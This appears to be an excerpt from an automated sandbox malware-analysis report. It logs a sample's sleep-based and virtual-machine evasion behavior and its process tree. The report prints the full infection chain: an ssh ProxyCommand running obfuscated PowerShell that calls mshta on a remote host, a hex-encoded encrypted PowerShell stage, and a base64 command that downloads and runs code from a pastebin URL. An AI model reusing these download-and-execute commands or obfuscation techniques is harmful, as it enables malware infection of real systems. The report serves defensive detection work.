        Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5268Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120Thread sleep count: 797 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6632Thread sleep count: 218 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6304Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1124Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -19369081277395017s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: ssh.exe, 00000000.00000002.2209926600.000001E7D3A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
        Source: mshta.exe, 00000005.00000003.2192577700.0000029153A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197047004.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
        Source: powershell.exe, 00000009.00000002.2439669604.0000029524D6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
        Source: powershell.exe, 00000007.00000002.2183387067.0000022CF4021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
        Source: mshta.exe, 00000005.00000003.2197047004.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWcy
        Source: powershell.exe, 00000009.00000002.2439669604.0000029524DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_`
        Source: mshta.exe, 00000005.00000003.2190556968.0000029153AA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197459842.0000029153AA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205615137.0000029153AA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3313335547.000001FDFF259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3312071099.000001FDFDA2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: mshta.exe, 00000005.00000002.2205829661.0000029153ACC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: powershell.exe, 00000009.00000002.2439669604.0000029524D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell decode and execute
        Source: Yara matchFile source: amsi64_6568.amsi.csv, type: OTHER
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_6568.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR
        Encrypted powershell cmdline option found
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded [NET.serVICepointMaNagEr]::SeCurITyPROTOCoL = [Net.sEcuRitYpROTOcoLTYpE]::Tls, [neT.sECUrITyPROTOCOLType]::Tls11, [neT.seCURityPROTOCOlTYpe]::Tls12, [net.sECuritypRoTocoltypE]::Ssl3 ; [nET.SErViCEPoinTMANageR]::SeCURityPrOtOcol = 'Tls, Tls11, Tls12, Ssl3' ; iex( Iwr ([chaR] 0X68 + [cHaR] 0X74 + [ChAr] 0X74 + [cHAR] 0x70 + [CHAR] 0x73 + [cHar] 0X3A + [CHaR] 0x2F + [ChAR] 0X2F + [chAr] 0X70 + [cHAr] 0x61 + [char] 0x73 + [CHAR] 0X74 + [CHAr] 0x65 + [chAr] 0X62 + [Char] 0X69 + [ChaR] 0x6E + [cHAr] 0X2E + [chAR] 0x63 + [CHar] 0x6F + [chAr] 0x6D + [ChAR] 0x2F + [ChaR] 0X72 + [ChAr] 0x61 + [ChAR] 0x77 + [chaR] 0x2F + [CHar] 0x30 + [cHAr] 0X76 + [chAR] 0X36 + [CHAR] 0X56 + [Char] 0x68 + [ChAR] 0X76 + [ChaR] 0X70 + [char] 0x62 ))Jump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
        Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ehno($fvnow){return -split ($fvnow -replace '..', '0x$& ')};$mbao = ehno('c38a8314c6d512db74485356be39888ee9925c2281b41a870a93c8b2d5d640a69c1b84fb174e3857338a3f29b0bc201cbae4c0e078a084feab36d6e5c129923577a943a7b7b9e80cd4b717b35ab910c6e3b0fa9a865cf551a2dc2adfcff3ebb21ebd7dedd60edc13026c153388485fdf1ac35bc0468a5c535651df2806d21d4018c2a7b7e992a43e2dabb65d2351bd518d491bbbb8df843c260a441f6a53c1efbdaf7229d9fae26fc27f5b05d380bc26ca0febdd5ba5a0eb82a1e7f9a938b5ed11edfe83733ee5bd9b41842a66b0aed9471aa6556bf7d0c653e7003b7fa9b58b38490b6f52df4a87d2b53f600a141d60a19dc2aa34a224ef47c6df92b8db56263e9c7f55ee4158fad446b242313ddb8bf39449db89bc72d11a11652ef4dfefd667902331ea74794b6a67b4cdd5aca8760d9ffd3767a211c0fa243363a1bd5bb01fca17d6abd4e3641cb89fe09848fc0b87c1682bd406b1ffb48111d826bf42319f86eddf54ef392181d1835103092bd65f468d5cd7509428f489c18c9ed716c0826433468e3dc8cac68fe4c8e73d4a7af24e20e29ce8bc747e51c7d60211d1d9108a36e9ed5894ec918826dd0d2ba213c9cbeaed248628920c4034a6a1ac220514dd10f6495b697ab9fa5d222ff857b08914a98ef2f41eeb2a13fb672cf5121aa56b9700672ac61423e329f5be09d7e42a8f5e7472b06b08ed17223ad27ab1fdcd50aee7a03c7752206d59395e1e657839378114582ce5288a87307a61f294b3a99ac37dccd3c76f9b7c1eb5b34a5af3addeb53175c886fd46cd841bccaec99ceb11da016155a428190129b6cd87effeca8e9b27b519708ed1c4b71e4854a661a036b6cbe8bd2751b09ac153946351dd8d6d3e057c12bab88d69dd739087af882d851ce6d6e1e28a9622113d283879b560ac3c94753656293b30a504c24c3b832c6b0f7f82a720eebfe712e1b11cd932c9e5c7d456c06867a74ad3a97f905ced36247b87f0625b42f75ba4945635b18a82edf26e5861c329bfeadaf94ca576635764882b1cd7a6e75d104129fc224ebfbeb94a628cea56f0a3828f40710143735da31b592516964e704bb489e450292571ed1b8ee1f001ae77c6fc25b2078e74a31d038e1d03acca3c7c6a8fab337c633522a66604a1bb8b9c555e3bbe6348ce9b111d471d213702c17f614c86fbf8fe91b3781d35df5b128cc95ed1667145fe3b243e6951a9455caec033289d883dfb031e516e037e4a4668162ad2ad1d871e1870afce9730fa836626e94f80307146b75cf9e7ac57bc4dc6adac9fbae30d68030ae39a44bc038fc72594dae859a181023d142321d6a31cb9f0b84d661bec72bf3124f1b60880a358fe25760e1bd0a0f6392fb0747b86c767385a6e06d6207459916c16aecb2f1f5bd994db8ca214ecfe96cb37ca7850202770519a107dc62590038a540a914afe664965b27756163566be349ed77e33b9b52eb99797311123c2913e9ddac39eb6ecff220a911f4cba4bbca42e3efe5f7a92756b074da2deb89d425b04034b270c25948c41781e22c34a0f380a6c22935256d47847bb6239faf39d9d1fc1ea9d6e43efcfb896c1d8816dd34cd7f6d433db2abba7ddc692858222f86a44530fddf5153e885d5b67441d8c8252ee75ca3c4d9808383692638135e3551937b256f7773f54a85e36840866a5b362f59589ded49a08715a66e8242c25bfaf5f34cd1e1c54fc418eadddf6e597a520ee2a3d0436285a094388df2f75dc594b5562e58f69ba6b5ec4606185875510834c2b4e4d185598fa71136e84c07d63a81b60fc526fcfcdc2687fb8f2a82163a586b78c9ef88f7baae26cfdc354883e02a310dcefd9a626f0dc7297eb531abe66b7a5c983397f08d52e357d101cc123ad37ea8123cd23fbb08bd4714c8f0417a9fc433bb55a6e1d2af00f7a078fe782c81f40749b962591
        Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ehno($fvnow){return -split ($fvnow -replace '..', '0x$& ')};$mbao = ehno('c38a8314c6d512db74485356be39888ee9925c2281b41a870a93c8b2d5d640a69c1b84fb174e3857338a3f29b0bc201cbae4c0e078a084feab36d6e5c129923577a943a7b7b9e80cd4b717b35ab910c6e3b0fa9a865cf551a2dc2adfcff3ebb21ebd7dedd60edc13026c153388485fdf1ac35bc0468a5c535651df2806d21d4018c2a7b7e992a43e2dabb65d2351bd518d491bbbb8df843c260a441f6a53c1efbdaf7229d9fae26fc27f5b05d380bc26ca0febdd5ba5a0eb82a1e7f9a938b5ed11edfe83733ee5bd9b41842a66b0aed9471aa6556bf7d0c653e7003b7fa9b58b38490b6f52df4a87d2b53f600a141d60a19dc2aa34a224ef47c6df92b8db56263e9c7f55ee4158fad446b242313ddb8bf39449db89bc72d11a11652ef4dfefd667902331ea74794b6a67b4cdd5aca8760d9ffd3767a211c0fa243363a1bd5bb01fca17d6abd4e3641cb89fe09848fc0b87c1682bd406b1ffb48111d826bf42319f86eddf54ef392181d1835103092bd65f468d5cd7509428f489c18c9ed716c0826433468e3dc8cac68fe4c8e73d4a7af24e20e29ce8bc747e51c7d60211d1d9108a36e9ed5894ec918826dd0d2ba213c9cbeaed248628920c4034a6a1ac220514dd10f6495b697ab9fa5d222ff857b08914a98ef2f41eeb2a13fb672cf5121aa56b9700672ac61423e329f5be09d7e42a8f5e7472b06b08ed17223ad27ab1fdcd50aee7a03c7752206d59395e1e657839378114582ce5288a87307a61f294b3a99ac37dccd3c76f9b7c1eb5b34a5af3addeb53175c886fd46cd841bccaec99ceb11da016155a428190129b6cd87effeca8e9b27b519708ed1c4b71e4854a661a036b6cbe8bd2751b09ac153946351dd8d6d3e057c12bab88d69dd739087af882d851ce6d6e1e28a9622113d283879b560ac3c94753656293b30a504c24c3b832c6b0f7f82a720eebfe712e1b11cd932c9e5c7d456c06867a74ad3a97f905ced36247b87f0625b42f75ba4945635b18a82edf26e5861c329bfeadaf94ca576635764882b1cd7a6e75d104129fc224ebfbeb94a628cea56f0a3828f40710143735da31b592516964e704bb489e450292571ed1b8ee1f001ae77c6fc25b2078e74a31d038e1d03acca3c7c6a8fab337c633522a66604a1bb8b9c555e3bbe6348ce9b111d471d213702c17f614c86fbf8fe91b3781d35df5b128cc95ed1667145fe3b243e6951a9455caec033289d883dfb031e516e037e4a4668162ad2ad1d871e1870afce9730fa836626e94f80307146b75cf9e7ac57bc4dc6adac9fbae30d68030ae39a44bc038fc72594dae859a181023d142321d6a31cb9f0b84d661bec72bf3124f1b60880a358fe25760e1bd0a0f6392fb0747b86c767385a6e06d6207459916c16aecb2f1f5bd994db8ca214ecfe96cb37ca7850202770519a107dc62590038a540a914afe664965b27756163566be349ed77e33b9b52eb99797311123c2913e9ddac39eb6ecff220a911f4cba4bbca42e3efe5f7a92756b074da2deb89d425b04034b270c25948c41781e22c34a0f380a6c22935256d47847bb6239faf39d9d1fc1ea9d6e43efcfb896c1d8816dd34cd7f6d433db2abba7ddc692858222f86a44530fddf5153e885d5b67441d8c8252ee75ca3c4d9808383692638135e3551937b256f7773f54a85e36840866a5b362f59589ded49a08715a66e8242c25bfaf5f34cd1e1c54fc418eadddf6e597a520ee2a3d0436285a094388df2f75dc594b5562e58f69ba6b5ec4606185875510834c2b4e4d185598fa71136e84c07d63a81b60fc526fcfcdc2687fb8f2a82163a586b78c9ef88f7baae26cfdc354883e02a310dcefd9a626f0dc7297eb531abe66b7a5c983397f08d52e357d101cc123ad37ea8123cd23fbb08bd4714c8f0417a9fc433bb55a6e1d2af00f7a078fe782c81f40749b962591Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -executionpolicy remotesigned -enc iaagacaawwboaeuavaauahmazqbyafyasqbdaguacabvagkabgb0ae0ayqboageazwbfahiaxqa6adoauwblaemadqbyaekavab5afaaugbpafqatwbdag8ataagaakacqa9acaacqbbae4azqb0ac4acwbfagmadqbsagkadabzahaaugbpafqatwbjag8atabuafkacabfaf0aoga6afqababzacwaiaagafsabgblafqalgbzaeuaqwbvahiasqbuahkauabsae8avabpaematwbmafqaeqbwaguaxqa6adoavabsahmamqaxacwaiaajafsabgblafqalgbzaguaqwbvafiaaqb0ahkauabsae8avabpaematwbsafqawqbwaguaxqa6adoavabsahmamqayacwaiaajafsabgblahqalgbzaeuaqwb1ahiaaqb0ahkacabsag8avabvagmabwbsahqaeqbwaeuaxqa6adoauwbzagwamwagacaaowagaakaiabbag4arqbuac4auwbfahiavgbpaemarqbqag8aaqbuafqatqbbae4ayqbnaguaugbdadoaogbtaguaqwbvafiaaqb0ahkauabyae8adabpagmabwbsacaacqa9acaacqajaccavabsahmalaagaakavabsahmamqaxacwaiaagaakavabsahmamqayacwaiaajafmacwbsadmajwagacaacqa7acaaiaajagkazqb4acgaiaagacaasqb3ahiaiaajaakakabbagmaaabhafiaxqagacaacqawafganga4acaaiaajacaaiaajacsaiaagaakawwbjaegayqbsaf0aiaagaakamabyadcanaagacaacqagacaacqaracaaiaajafsaqwboaeeacgbdacaaiaajadaawaa3adqaiaagaakaiaagaakakwagacaacqbbagmasabbafiaxqagacaacqawahganwawacaaiaajacaaiaajacsaiaagaakawwbdaegaqqbsaf0aiaagaakamab4adcamwagacaacqagacaacqaracaaiaajafsaywbiageacgb